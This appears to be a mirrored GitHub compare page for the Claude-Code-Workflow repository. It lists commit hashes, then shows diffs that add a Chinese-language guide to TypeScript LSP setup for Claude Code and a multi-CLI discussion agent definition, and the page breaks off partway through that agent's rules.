mirror of
https://github.com/catlog22/Claude-Code-Workflow.git
synced 2026-02-06 01:54:11 +08:00
Compare commits
138 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
604405b2d6 | ||
|
|
190d2280fd | ||
|
|
4e66864cfd | ||
|
|
cac0566627 | ||
|
|
572c103fbf | ||
|
|
9d6bc92837 | ||
|
|
ffe9898fd3 | ||
|
|
a602a46985 | ||
|
|
f7dd3d23ff | ||
|
|
200812d204 | ||
|
|
261c98549d | ||
|
|
b85d9b9eb1 | ||
|
|
4610018193 | ||
|
|
9c9b1ad01c | ||
|
|
2f3a14e946 | ||
|
|
1376dc71d9 | ||
|
|
c1d12384c3 | ||
|
|
eea859dd6f | ||
|
|
3fe630f221 | ||
|
|
eeaefa7208 | ||
|
|
e58c33fb6e | ||
|
|
6716772e0a | ||
|
|
a8367bd4d7 | ||
|
|
ea13f9a575 | ||
|
|
7d152b7bf9 | ||
|
|
16c96229f9 | ||
|
|
40b003be68 | ||
|
|
46111b3987 | ||
|
|
f47726d43b | ||
|
|
502d088c98 | ||
|
|
f845e6e0ee | ||
|
|
e96eed817c | ||
|
|
6a6d1885d8 | ||
|
|
a34eeb63bf | ||
|
|
56acc4f19c | ||
|
|
fdf468ed99 | ||
|
|
680c2a0597 | ||
|
|
5b5dc85677 | ||
|
|
1e691fa751 | ||
|
|
1f87ca0be3 | ||
|
|
f14418603a | ||
|
|
1fae35c05d | ||
|
|
8523079a99 | ||
|
|
4daeb0eead | ||
|
|
86548af518 | ||
|
|
4e5eb6cd40 | ||
|
|
021ce619f0 | ||
|
|
63aaab596c | ||
|
|
bc52af540e | ||
|
|
8bbbdc61eb | ||
|
|
fd5f6c2c97 | ||
|
|
fd145c34cd | ||
|
|
10b3ace917 | ||
|
|
d6a2e0de59 | ||
|
|
35c6605681 | ||
|
|
ef2229b0bb | ||
|
|
b65977d8dc | ||
|
|
bc4176fda0 | ||
|
|
464f3343f3 | ||
|
|
bb6cf42df6 | ||
|
|
0f0cb7e08e | ||
|
|
39d070eab6 | ||
|
|
9ccaa7e2fd | ||
|
|
eeb90949ce | ||
|
|
7b677b20fb | ||
|
|
e2d56bc08a | ||
|
|
d515090097 | ||
|
|
d81dfaf143 | ||
|
|
d7e5ee44cc | ||
|
|
dde39fc6f5 | ||
|
|
9b4fdc1868 | ||
|
|
623afc1d35 | ||
|
|
085652560a | ||
|
|
af4ddb1280 | ||
|
|
7db659f0e1 | ||
|
|
ba526ea09e | ||
|
|
c308e429f8 | ||
|
|
c24ed016cb | ||
|
|
0c9a6d4154 | ||
|
|
7b5c3cacaa | ||
|
|
e6e7876b38 | ||
|
|
0eda520fd7 | ||
|
|
e22b525e9c | ||
|
|
86536aaa10 | ||
|
|
3ef766708f | ||
|
|
95a7f05aa9 | ||
|
|
f692834153 | ||
|
|
a228bb946b | ||
|
|
4d57f47717 | ||
|
|
c8cac5b201 | ||
|
|
f9c1216eec | ||
|
|
266f6f11ec | ||
|
|
1f5ce9c03a | ||
|
|
959d60b31f | ||
|
|
49845fe1ae | ||
|
|
aeb111420e | ||
|
|
6ff3e5f8fe | ||
|
|
d941166d84 | ||
|
|
ac9ba5c7e4 | ||
|
|
9e55f51501 | ||
|
|
43b8cfc7b0 | ||
|
|
633d918da1 | ||
|
|
6b4b9b0775 | ||
|
|
360d29d7be | ||
|
|
4fe7f6cde6 | ||
|
|
6922ca27de | ||
|
|
c3da637849 | ||
|
|
2f1c56285a | ||
|
|
85972b73ea | ||
|
|
6305f19bbb | ||
|
|
275d2cb0af | ||
|
|
d5f57d29ed | ||
|
|
7d8b13f34f | ||
|
|
340137d347 | ||
|
|
61cef8019a | ||
|
|
08308aa9ea | ||
|
|
94ae9e264c | ||
|
|
549e6e70e4 | ||
|
|
15514c8f91 | ||
|
|
29c8bb7a66 | ||
|
|
76f5311e78 | ||
|
|
ca6677149a | ||
|
|
880376aefc | ||
|
|
a20f81d44a | ||
|
|
a8627e7f68 | ||
|
|
4caa622942 | ||
|
|
6b8e73bd32 | ||
|
|
68c4c54b64 | ||
|
|
1dca4b06a2 | ||
|
|
a8ec42233f | ||
|
|
49a7c17ba8 | ||
|
|
8a15e08944 | ||
|
|
8c2d39d517 | ||
|
|
bf06f4ddcc | ||
|
|
28645aa4e4 | ||
|
|
cdcb517bc2 | ||
|
|
a63d547856 | ||
|
|
d994274023 |
@@ -29,7 +29,17 @@ Available CLI endpoints are dynamically defined by the config file:
|
||||
```
|
||||
Bash({ command: "ccw cli -p '...' --tool gemini", run_in_background: true })
|
||||
```
|
||||
- **After CLI call**: Stop immediately - let CLI execute in background, do NOT poll with TaskOutput
|
||||
- **After CLI call**: Stop output immediately - let CLI execute in background. **DO NOT use TaskOutput polling** - wait for hook callback to receive results
|
||||
|
||||
### CLI Analysis Calls
|
||||
- **Wait for results**: MUST wait for CLI analysis to complete before taking any write action. Do NOT proceed with fixes while analysis is running
|
||||
- **Value every call**: Each CLI invocation is valuable and costly. NEVER waste analysis results:
|
||||
- Aggregate multiple analysis results before proposing solutions
|
||||
|
||||
### CLI Auto-Invoke Triggers
|
||||
- **Reference**: See `cli-tools-usage.md` → [Auto-Invoke Triggers](#auto-invoke-triggers) for full specification
|
||||
- **Key scenarios**: Self-repair fails, ambiguous requirements, architecture decisions, pattern uncertainty, critical code paths
|
||||
- **Principles**: Default `--mode analysis`, no confirmation needed, wait for completion, flexible rule selection
|
||||
|
||||
## Code Diagnostics
|
||||
|
||||
|
||||
366
.claude/TYPESCRIPT_LSP_SETUP.md
Normal file
366
.claude/TYPESCRIPT_LSP_SETUP.md
Normal file
@@ -0,0 +1,366 @@
|
||||
# Claude Code TypeScript LSP 配置指南
|
||||
|
||||
> 更新日期: 2026-01-20
|
||||
> 适用版本: Claude Code v2.0.74+
|
||||
|
||||
---
|
||||
|
||||
## 目录
|
||||
|
||||
1. [方式一:插件市场(推荐)](#方式一插件市场推荐)
|
||||
2. [方式二:MCP Server (cclsp)](#方式二mcp-server-cclsp)
|
||||
3. [方式三:内置LSP工具](#方式三内置lsp工具)
|
||||
4. [配置验证](#配置验证)
|
||||
5. [故障排查](#故障排查)
|
||||
|
||||
---
|
||||
|
||||
## 方式一:插件市场(推荐)
|
||||
|
||||
### 步骤 1: 添加插件市场
|
||||
|
||||
在Claude Code中执行:
|
||||
|
||||
```bash
|
||||
/plugin marketplace add boostvolt/claude-code-lsps
|
||||
```
|
||||
|
||||
### 步骤 2: 安装TypeScript LSP插件
|
||||
|
||||
```bash
|
||||
# TypeScript/JavaScript支持(推荐vtsls)
|
||||
/plugin install vtsls@claude-code-lsps
|
||||
```
|
||||
|
||||
### 步骤 3: 验证安装
|
||||
|
||||
```bash
|
||||
/plugin list
|
||||
```
|
||||
|
||||
应该看到:
|
||||
```
|
||||
✓ vtsls@claude-code-lsps (enabled)
|
||||
✓ pyright-lsp@claude-plugins-official (enabled)
|
||||
```
|
||||
|
||||
### 配置文件自动更新
|
||||
|
||||
安装后,`~/.claude/settings.json` 会自动添加:
|
||||
|
||||
```json
|
||||
{
|
||||
"enabledPlugins": {
|
||||
"pyright-lsp@claude-plugins-official": true,
|
||||
"vtsls@claude-code-lsps": true
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 支持的操作
|
||||
|
||||
- `goToDefinition` - 跳转到定义
|
||||
- `findReferences` - 查找引用
|
||||
- `hover` - 显示类型信息
|
||||
- `documentSymbol` - 文档符号
|
||||
- `getDiagnostics` - 诊断信息
|
||||
|
||||
---
|
||||
|
||||
## 方式二:MCP Server (cclsp)
|
||||
|
||||
### 优势
|
||||
|
||||
- **位置容错**:自动修正AI生成的不精确行号
|
||||
- **更多功能**:支持重命名、完整诊断
|
||||
- **灵活配置**:完全自定义LSP服务器
|
||||
|
||||
### 安装步骤
|
||||
|
||||
#### 1. 安装TypeScript Language Server
|
||||
|
||||
```bash
|
||||
npm install -g typescript-language-server typescript
|
||||
```
|
||||
|
||||
验证安装:
|
||||
```bash
|
||||
typescript-language-server --version
|
||||
```
|
||||
|
||||
#### 2. 配置cclsp
|
||||
|
||||
运行自动配置:
|
||||
```bash
|
||||
npx cclsp@latest setup --user
|
||||
```
|
||||
|
||||
或手动创建配置文件:
|
||||
|
||||
**文件位置**: `~/.claude/cclsp.json` 或 `~/.config/claude/cclsp.json`
|
||||
|
||||
```json
|
||||
{
|
||||
"servers": [
|
||||
{
|
||||
"extensions": ["ts", "tsx", "js", "jsx"],
|
||||
"command": ["typescript-language-server", "--stdio"],
|
||||
"rootDir": ".",
|
||||
"restartInterval": 5,
|
||||
"initializationOptions": {
|
||||
"preferences": {
|
||||
"includeInlayParameterNameHints": "all",
|
||||
"includeInlayPropertyDeclarationTypeHints": true,
|
||||
"includeInlayFunctionParameterTypeHints": true,
|
||||
"includeInlayVariableTypeHints": true
|
||||
}
|
||||
}
|
||||
},
|
||||
{
|
||||
"extensions": ["py", "pyi"],
|
||||
"command": ["pylsp"],
|
||||
"rootDir": ".",
|
||||
"restartInterval": 5
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
#### 3. 在Claude Code中启用MCP Server
|
||||
|
||||
添加到Claude Code配置:
|
||||
|
||||
```bash
|
||||
# 查看当前MCP配置
|
||||
cat ~/.claude/.mcp.json
|
||||
|
||||
# 如果没有,创建新的
|
||||
```
|
||||
|
||||
**文件**: `~/.claude/.mcp.json`
|
||||
|
||||
```json
|
||||
{
|
||||
"mcpServers": {
|
||||
"cclsp": {
|
||||
"command": "npx",
|
||||
"args": ["cclsp@latest"]
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### cclsp可用的MCP工具
|
||||
|
||||
使用时,Claude Code会自动调用这些工具:
|
||||
|
||||
- `find_definition` - 按名称查找定义(支持模糊匹配)
|
||||
- `find_references` - 查找所有引用
|
||||
- `rename_symbol` - 重命名符号(带备份)
|
||||
- `get_diagnostics` - 获取诊断信息
|
||||
- `restart_server` - 重启LSP服务器
|
||||
|
||||
---
|
||||
|
||||
## 方式三:内置LSP工具
|
||||
|
||||
### 启用方式
|
||||
|
||||
设置环境变量:
|
||||
|
||||
**Linux/Mac**:
|
||||
```bash
|
||||
export ENABLE_LSP_TOOL=1
|
||||
claude
|
||||
```
|
||||
|
||||
**Windows (PowerShell)**:
|
||||
```powershell
|
||||
$env:ENABLE_LSP_TOOL=1
|
||||
claude
|
||||
```
|
||||
|
||||
**永久启用** (添加到shell配置):
|
||||
```bash
|
||||
# Linux/Mac
|
||||
echo 'export ENABLE_LSP_TOOL=1' >> ~/.bashrc
|
||||
source ~/.bashrc
|
||||
|
||||
# Windows (PowerShell Profile)
|
||||
Add-Content $PROFILE '$env:ENABLE_LSP_TOOL=1'
|
||||
```
|
||||
|
||||
### 限制
|
||||
|
||||
- 需要先安装语言服务器插件(见方式一)
|
||||
- 不支持重命名等高级操作
|
||||
- 无位置容错功能
|
||||
|
||||
---
|
||||
|
||||
## 配置验证
|
||||
|
||||
### 1. 检查LSP服务器是否可用
|
||||
|
||||
```bash
|
||||
# 检查TypeScript Language Server
|
||||
which typescript-language-server # Linux/Mac
|
||||
where typescript-language-server # Windows
|
||||
|
||||
# 测试运行
|
||||
typescript-language-server --stdio
|
||||
```
|
||||
|
||||
### 2. 在Claude Code中测试
|
||||
|
||||
打开任意TypeScript文件,让Claude执行:
|
||||
|
||||
```typescript
|
||||
// 测试LSP功能
|
||||
LSP({
|
||||
operation: "hover",
|
||||
filePath: "path/to/your/file.ts",
|
||||
line: 10,
|
||||
character: 5
|
||||
})
|
||||
```
|
||||
|
||||
### 3. 检查插件状态
|
||||
|
||||
```bash
|
||||
/plugin list
|
||||
```
|
||||
|
||||
查看启用的插件:
|
||||
```bash
|
||||
cat ~/.claude/settings.json | grep enabledPlugins
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 故障排查
|
||||
|
||||
### 问题 1: "No LSP server available"
|
||||
|
||||
**原因**:TypeScript LSP插件未安装或未启用
|
||||
|
||||
**解决**:
|
||||
```bash
|
||||
# 重新安装插件
|
||||
/plugin install vtsls@claude-code-lsps
|
||||
|
||||
# 检查settings.json
|
||||
cat ~/.claude/settings.json
|
||||
```
|
||||
|
||||
### 问题 2: "typescript-language-server: command not found"
|
||||
|
||||
**原因**:未安装TypeScript Language Server
|
||||
|
||||
**解决**:
|
||||
```bash
|
||||
npm install -g typescript-language-server typescript
|
||||
|
||||
# 验证
|
||||
typescript-language-server --version
|
||||
```
|
||||
|
||||
### 问题 3: LSP响应慢或超时
|
||||
|
||||
**原因**:项目太大或配置不当
|
||||
|
||||
**解决**:
|
||||
```json
|
||||
// 在tsconfig.json中优化
|
||||
{
|
||||
"compilerOptions": {
|
||||
"incremental": true,
|
||||
"skipLibCheck": true
|
||||
},
|
||||
"exclude": ["node_modules", "dist"]
|
||||
}
|
||||
```
|
||||
|
||||
### 问题 4: 插件安装失败
|
||||
|
||||
**原因**:网络问题或插件市场未添加
|
||||
|
||||
**解决**:
|
||||
```bash
|
||||
# 确认插件市场已添加
|
||||
/plugin marketplace list
|
||||
|
||||
# 如果没有,重新添加
|
||||
/plugin marketplace add boostvolt/claude-code-lsps
|
||||
|
||||
# 重试安装
|
||||
/plugin install vtsls@claude-code-lsps
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 三种方式对比
|
||||
|
||||
| 特性 | 插件市场 | cclsp (MCP) | 内置LSP |
|
||||
|------|----------|-------------|---------|
|
||||
| 安装复杂度 | ⭐ 低 | ⭐⭐ 中 | ⭐ 低 |
|
||||
| 功能完整性 | ⭐⭐⭐ 完整 | ⭐⭐⭐ 完整+ | ⭐⭐ 基础 |
|
||||
| 位置容错 | ❌ 无 | ✅ 有 | ❌ 无 |
|
||||
| 重命名支持 | ✅ 有 | ✅ 有 | ❌ 无 |
|
||||
| 自定义配置 | ⚙️ 有限 | ⚙️ 完整 | ❌ 无 |
|
||||
| 生产稳定性 | ⭐⭐⭐ 高 | ⭐⭐ 中 | ⭐⭐⭐ 高 |
|
||||
|
||||
---
|
||||
|
||||
## 推荐配置
|
||||
|
||||
### 新手用户
|
||||
**推荐**: 方式一(插件市场)
|
||||
- 一条命令安装
|
||||
- 官方维护,稳定可靠
|
||||
- 满足日常使用需求
|
||||
|
||||
### 高级用户
|
||||
**推荐**: 方式二(cclsp)
|
||||
- 完整功能支持
|
||||
- 位置容错(AI友好)
|
||||
- 灵活配置
|
||||
- 支持重命名等高级操作
|
||||
|
||||
### 快速测试
|
||||
**推荐**: 方式三(内置LSP)+ 方式一(插件)
|
||||
- 设置环境变量
|
||||
- 安装插件
|
||||
- 立即可用
|
||||
|
||||
---
|
||||
|
||||
## 附录:支持的语言
|
||||
|
||||
通过插件市场可用的LSP:
|
||||
|
||||
| 语言 | 插件名 | 安装命令 |
|
||||
|------|--------|----------|
|
||||
| TypeScript/JavaScript | vtsls | `/plugin install vtsls@claude-code-lsps` |
|
||||
| Python | pyright | `/plugin install pyright@claude-code-lsps` |
|
||||
| Go | gopls | `/plugin install gopls@claude-code-lsps` |
|
||||
| Rust | rust-analyzer | `/plugin install rust-analyzer@claude-code-lsps` |
|
||||
| Java | jdtls | `/plugin install jdtls@claude-code-lsps` |
|
||||
| C/C++ | clangd | `/plugin install clangd@claude-code-lsps` |
|
||||
| C# | omnisharp | `/plugin install omnisharp@claude-code-lsps` |
|
||||
| PHP | intelephense | `/plugin install intelephense@claude-code-lsps` |
|
||||
| Kotlin | kotlin-ls | `/plugin install kotlin-language-server@claude-code-lsps` |
|
||||
| Ruby | solargraph | `/plugin install solargraph@claude-code-lsps` |
|
||||
|
||||
---
|
||||
|
||||
## 相关文档
|
||||
|
||||
- [Claude Code LSP 文档](https://docs.anthropic.com/claude-code/lsp)
|
||||
- [cclsp GitHub](https://github.com/ktnyt/cclsp)
|
||||
- [TypeScript Language Server](https://github.com/typescript-language-server/typescript-language-server)
|
||||
- [Plugin Marketplace](https://github.com/boostvolt/claude-code-lsps)
|
||||
|
||||
---
|
||||
|
||||
**配置完成后,重启Claude Code以应用更改**
|
||||
@@ -855,6 +855,7 @@ Use `analysis_results.complexity` or task count to determine structure:
|
||||
### 3.3 Guidelines Checklist
|
||||
|
||||
**ALWAYS:**
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- Apply Quantification Requirements to all requirements, acceptance criteria, and modification points
|
||||
- Load IMPL_PLAN template: `Read(~/.claude/workflows/cli-templates/prompts/workflow/impl-plan-template.txt)` before generating IMPL_PLAN.md
|
||||
- Use provided context package: Extract all information from structured context
|
||||
|
||||
391
.claude/agents/cli-discuss-agent.md
Normal file
391
.claude/agents/cli-discuss-agent.md
Normal file
@@ -0,0 +1,391 @@
|
||||
---
|
||||
name: cli-discuss-agent
|
||||
description: |
|
||||
Multi-CLI collaborative discussion agent with cross-verification and solution synthesis.
|
||||
Orchestrates 5-phase workflow: Context Prep → CLI Execution → Cross-Verify → Synthesize → Output
|
||||
color: magenta
|
||||
allowed-tools: mcp__ace-tool__search_context(*), Bash(*), Read(*), Write(*), Glob(*), Grep(*)
|
||||
---
|
||||
|
||||
You are a specialized CLI discussion agent that orchestrates multiple CLI tools to analyze tasks, cross-verify findings, and synthesize structured solutions.
|
||||
|
||||
## Core Capabilities
|
||||
|
||||
1. **Multi-CLI Orchestration** - Invoke Gemini, Codex, Qwen for diverse perspectives
|
||||
2. **Cross-Verification** - Compare findings, identify agreements/disagreements
|
||||
3. **Solution Synthesis** - Merge approaches, score and rank by consensus
|
||||
4. **Context Enrichment** - ACE semantic search for supplementary context
|
||||
|
||||
**Discussion Modes**:
|
||||
- `initial` → First round, establish baseline analysis (parallel execution)
|
||||
- `iterative` → Build on previous rounds with user feedback (parallel + resume)
|
||||
- `verification` → Cross-verify specific approaches (serial execution)
|
||||
|
||||
---
|
||||
|
||||
## 5-Phase Execution Workflow
|
||||
|
||||
```
|
||||
Phase 1: Context Preparation
|
||||
↓ Parse input, enrich with ACE if needed, create round folder
|
||||
Phase 2: Multi-CLI Execution
|
||||
↓ Build prompts, execute CLIs with fallback chain, parse outputs
|
||||
Phase 3: Cross-Verification
|
||||
↓ Compare findings, identify agreements/disagreements, resolve conflicts
|
||||
Phase 4: Solution Synthesis
|
||||
↓ Extract approaches, merge similar, score and rank top 3
|
||||
Phase 5: Output Generation
|
||||
↓ Calculate convergence, generate questions, write synthesis.json
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Input Schema
|
||||
|
||||
**From orchestrator** (may be JSON strings):
|
||||
- `task_description` - User's task or requirement
|
||||
- `round_number` - Current discussion round (1, 2, 3...)
|
||||
- `session` - `{ id, folder }` for output paths
|
||||
- `ace_context` - `{ relevant_files[], detected_patterns[], architecture_insights }`
|
||||
- `previous_rounds` - Array of prior SynthesisResult (optional)
|
||||
- `user_feedback` - User's feedback from last round (optional)
|
||||
- `cli_config` - `{ tools[], timeout, fallback_chain[], mode }` (optional)
|
||||
- `tools`: Default `['gemini', 'codex']` or `['gemini', 'codex', 'claude']`
|
||||
- `fallback_chain`: Default `['gemini', 'codex', 'claude']`
|
||||
- `mode`: `'parallel'` (default) or `'serial'`
|
||||
|
||||
---
|
||||
|
||||
## Output Schema
|
||||
|
||||
**Output Path**: `{session.folder}/rounds/{round_number}/synthesis.json`
|
||||
|
||||
```json
|
||||
{
|
||||
"round": 1,
|
||||
"solutions": [
|
||||
{
|
||||
"name": "Solution Name",
|
||||
"source_cli": ["gemini", "codex"],
|
||||
"feasibility": 0.85,
|
||||
"effort": "low|medium|high",
|
||||
"risk": "low|medium|high",
|
||||
"summary": "Brief analysis summary",
|
||||
"implementation_plan": {
|
||||
"approach": "High-level technical approach",
|
||||
"tasks": [
|
||||
{
|
||||
"id": "T1",
|
||||
"name": "Task name",
|
||||
"depends_on": [],
|
||||
"files": [{"file": "path", "line": 10, "action": "modify|create|delete"}],
|
||||
"key_point": "Critical consideration for this task"
|
||||
},
|
||||
{
|
||||
"id": "T2",
|
||||
"name": "Second task",
|
||||
"depends_on": ["T1"],
|
||||
"files": [{"file": "path2", "line": 1, "action": "create"}],
|
||||
"key_point": null
|
||||
}
|
||||
],
|
||||
"execution_flow": "T1 → T2 → T3 (T2,T3 can parallel after T1)",
|
||||
"milestones": ["Interface defined", "Core logic complete", "Tests passing"]
|
||||
},
|
||||
"dependencies": {
|
||||
"internal": ["@/lib/module"],
|
||||
"external": ["npm:package@version"]
|
||||
},
|
||||
"technical_concerns": ["Potential blocker 1", "Risk area 2"]
|
||||
}
|
||||
],
|
||||
"convergence": {
|
||||
"score": 0.75,
|
||||
"new_insights": true,
|
||||
"recommendation": "converged|continue|user_input_needed"
|
||||
},
|
||||
"cross_verification": {
|
||||
"agreements": ["point 1"],
|
||||
"disagreements": ["point 2"],
|
||||
"resolution": "how resolved"
|
||||
},
|
||||
"clarification_questions": ["question 1?"]
|
||||
}
|
||||
```
|
||||
|
||||
**Schema Fields**:
|
||||
|
||||
| Field | Purpose |
|
||||
|-------|---------|
|
||||
| `feasibility` | Quantitative viability score (0-1) |
|
||||
| `summary` | Narrative analysis summary |
|
||||
| `implementation_plan.approach` | High-level technical strategy |
|
||||
| `implementation_plan.tasks[]` | Discrete implementation tasks |
|
||||
| `implementation_plan.tasks[].depends_on` | Task dependencies (IDs) |
|
||||
| `implementation_plan.tasks[].key_point` | Critical consideration for task |
|
||||
| `implementation_plan.execution_flow` | Visual task sequence |
|
||||
| `implementation_plan.milestones` | Key checkpoints |
|
||||
| `technical_concerns` | Specific risks/blockers |
|
||||
|
||||
**Note**: Solutions ranked by internal scoring (array order = priority). `pros/cons` merged into `summary` and `technical_concerns`.
|
||||
|
||||
---
|
||||
|
||||
## Phase 1: Context Preparation
|
||||
|
||||
**Parse input** (handle JSON strings from orchestrator):
|
||||
```javascript
|
||||
const ace_context = typeof input.ace_context === 'string'
|
||||
? JSON.parse(input.ace_context) : input.ace_context || {}
|
||||
const previous_rounds = typeof input.previous_rounds === 'string'
|
||||
? JSON.parse(input.previous_rounds) : input.previous_rounds || []
|
||||
```
|
||||
|
||||
**ACE Supplementary Search** (when needed):
|
||||
```javascript
|
||||
// Trigger conditions:
|
||||
// - Round > 1 AND relevant_files < 5
|
||||
// - Previous solutions reference unlisted files
|
||||
if (shouldSupplement) {
|
||||
mcp__ace-tool__search_context({
|
||||
project_root_path: process.cwd(),
|
||||
query: `Implementation patterns for ${task_keywords}`
|
||||
})
|
||||
}
|
||||
```
|
||||
|
||||
**Create round folder**:
|
||||
```bash
|
||||
mkdir -p {session.folder}/rounds/{round_number}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Phase 2: Multi-CLI Execution
|
||||
|
||||
### Available CLI Tools
|
||||
|
||||
三方 CLI 工具:
|
||||
- **gemini** - Google Gemini (deep code analysis perspective)
|
||||
- **codex** - OpenAI Codex (implementation verification perspective)
|
||||
- **claude** - Anthropic Claude (architectural analysis perspective)
|
||||
|
||||
### Execution Modes
|
||||
|
||||
**Parallel Mode** (default, faster):
|
||||
```
|
||||
┌─ gemini ─┐
|
||||
│ ├─→ merge results → cross-verify
|
||||
└─ codex ──┘
|
||||
```
|
||||
- Execute multiple CLIs simultaneously
|
||||
- Merge outputs after all complete
|
||||
- Use when: time-sensitive, independent analysis needed
|
||||
|
||||
**Serial Mode** (for cross-verification):
|
||||
```
|
||||
gemini → (output) → codex → (verify) → claude
|
||||
```
|
||||
- Each CLI receives prior CLI's output
|
||||
- Explicit verification chain
|
||||
- Use when: deep verification required, controversial solutions
|
||||
|
||||
**Mode Selection**:
|
||||
```javascript
|
||||
const execution_mode = cli_config.mode || 'parallel'
|
||||
// parallel: Promise.all([cli1, cli2, cli3])
|
||||
// serial: await cli1 → await cli2(cli1.output) → await cli3(cli2.output)
|
||||
```
|
||||
|
||||
### CLI Prompt Template
|
||||
|
||||
```bash
|
||||
ccw cli -p "
|
||||
PURPOSE: Analyze task from {perspective} perspective, verify technical feasibility
|
||||
TASK:
|
||||
• Analyze: \"{task_description}\"
|
||||
• Examine codebase patterns and architecture
|
||||
• Identify implementation approaches with trade-offs
|
||||
• Provide file:line references for integration points
|
||||
|
||||
MODE: analysis
|
||||
CONTEXT: @**/* | Memory: {ace_context_summary}
|
||||
{previous_rounds_section}
|
||||
{cross_verify_section}
|
||||
|
||||
EXPECTED: JSON with feasibility_score, findings, implementation_approaches, technical_concerns, code_locations
|
||||
|
||||
CONSTRAINTS:
|
||||
- Specific file:line references
|
||||
- Quantify effort estimates
|
||||
- Concrete pros/cons
|
||||
" --tool {tool} --mode analysis {resume_flag}
|
||||
```
|
||||
|
||||
### Resume Mechanism
|
||||
|
||||
**Session Resume** - Continue from previous CLI session:
|
||||
```bash
|
||||
# Resume last session
|
||||
ccw cli -p "Continue analysis..." --tool gemini --resume
|
||||
|
||||
# Resume specific session
|
||||
ccw cli -p "Verify findings..." --tool codex --resume <session-id>
|
||||
|
||||
# Merge multiple sessions
|
||||
ccw cli -p "Synthesize all..." --tool claude --resume <id1>,<id2>
|
||||
```
|
||||
|
||||
**When to Resume**:
|
||||
- Round > 1: Resume previous round's CLI session for context
|
||||
- Cross-verification: Resume primary CLI session for secondary to verify
|
||||
- User feedback: Resume with new constraints from user input
|
||||
|
||||
**Context Assembly** (automatic):
|
||||
```
|
||||
=== PREVIOUS CONVERSATION ===
|
||||
USER PROMPT: [Previous CLI prompt]
|
||||
ASSISTANT RESPONSE: [Previous CLI output]
|
||||
=== CONTINUATION ===
|
||||
[New prompt with updated context]
|
||||
```
|
||||
|
||||
### Fallback Chain
|
||||
|
||||
Execute primary tool → On failure, try next in chain:
|
||||
```
|
||||
gemini → codex → claude → degraded-analysis
|
||||
```
|
||||
|
||||
### Cross-Verification Mode
|
||||
|
||||
Second+ CLI receives prior analysis for verification:
|
||||
```json
|
||||
{
|
||||
"cross_verification": {
|
||||
"agrees_with": ["verified point 1"],
|
||||
"disagrees_with": ["challenged point 1"],
|
||||
"additions": ["new insight 1"]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Phase 3: Cross-Verification
|
||||
|
||||
**Compare CLI outputs**:
|
||||
1. Group similar findings across CLIs
|
||||
2. Identify multi-CLI agreements (2+ CLIs agree)
|
||||
3. Identify disagreements (conflicting conclusions)
|
||||
4. Generate resolution based on evidence weight
|
||||
|
||||
**Output**:
|
||||
```json
|
||||
{
|
||||
"agreements": ["Approach X proposed by gemini, codex"],
|
||||
"disagreements": ["Effort estimate differs: gemini=low, codex=high"],
|
||||
"resolution": "Resolved using code evidence from gemini"
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Phase 4: Solution Synthesis
|
||||
|
||||
**Extract and merge approaches**:
|
||||
1. Collect implementation_approaches from all CLIs
|
||||
2. Normalize names, merge similar approaches
|
||||
3. Combine pros/cons/affected_files from multiple sources
|
||||
4. Track source_cli attribution
|
||||
|
||||
**Internal scoring** (used for ranking, not exported):
|
||||
```
|
||||
score = (source_cli.length × 20) // Multi-CLI consensus
|
||||
+ effort_score[effort] // low=30, medium=20, high=10
|
||||
+ risk_score[risk] // low=30, medium=20, high=5
|
||||
+ (pros.length - cons.length) × 5 // Balance
|
||||
+ min(affected_files.length × 3, 15) // Specificity
|
||||
```
|
||||
|
||||
**Output**: Top 3 solutions, ranked in array order (highest score first)
|
||||
|
||||
---
|
||||
|
||||
## Phase 5: Output Generation
|
||||
|
||||
### Convergence Calculation
|
||||
|
||||
```
|
||||
score = agreement_ratio × 0.5 // agreements / (agreements + disagreements)
|
||||
+ avg_feasibility × 0.3 // average of CLI feasibility_scores
|
||||
+ stability_bonus × 0.2 // +0.2 if no new insights vs previous rounds
|
||||
|
||||
recommendation:
|
||||
- score >= 0.8 → "converged"
|
||||
- disagreements > 3 → "user_input_needed"
|
||||
- else → "continue"
|
||||
```
|
||||
|
||||
### Clarification Questions
|
||||
|
||||
Generate from:
|
||||
1. Unresolved disagreements (max 2)
|
||||
2. Technical concerns raised (max 2)
|
||||
3. Trade-off decisions needed
|
||||
|
||||
**Max 4 questions total**
|
||||
|
||||
### Write Output
|
||||
|
||||
```javascript
|
||||
Write({
|
||||
file_path: `${session.folder}/rounds/${round_number}/synthesis.json`,
|
||||
content: JSON.stringify(artifact, null, 2)
|
||||
})
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Error Handling
|
||||
|
||||
**CLI Failure**: Try fallback chain → Degraded analysis if all fail
|
||||
|
||||
**Parse Failure**: Extract bullet points from raw output as fallback
|
||||
|
||||
**Timeout**: Return partial results with timeout flag
|
||||
|
||||
---
|
||||
|
||||
## Quality Standards
|
||||
|
||||
| Criteria | Good | Bad |
|
||||
|----------|------|-----|
|
||||
| File references | `src/auth/login.ts:45` | "update relevant files" |
|
||||
| Effort estimate | `low` / `medium` / `high` | "some time required" |
|
||||
| Pros/Cons | Concrete, specific | Generic, vague |
|
||||
| Solution source | Multi-CLI consensus | Single CLI only |
|
||||
| Convergence | Score with reasoning | Binary yes/no |
|
||||
|
||||
---
|
||||
|
||||
## Key Reminders
|
||||
|
||||
**ALWAYS**:
|
||||
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
2. Execute multiple CLIs for cross-verification
|
||||
2. Parse CLI outputs with fallback extraction
|
||||
3. Include file:line references in affected_files
|
||||
4. Calculate convergence score accurately
|
||||
5. Write synthesis.json to round folder
|
||||
6. Use `run_in_background: false` for CLI calls
|
||||
7. Limit solutions to top 3
|
||||
8. Limit clarification questions to 4
|
||||
|
||||
**NEVER**:
|
||||
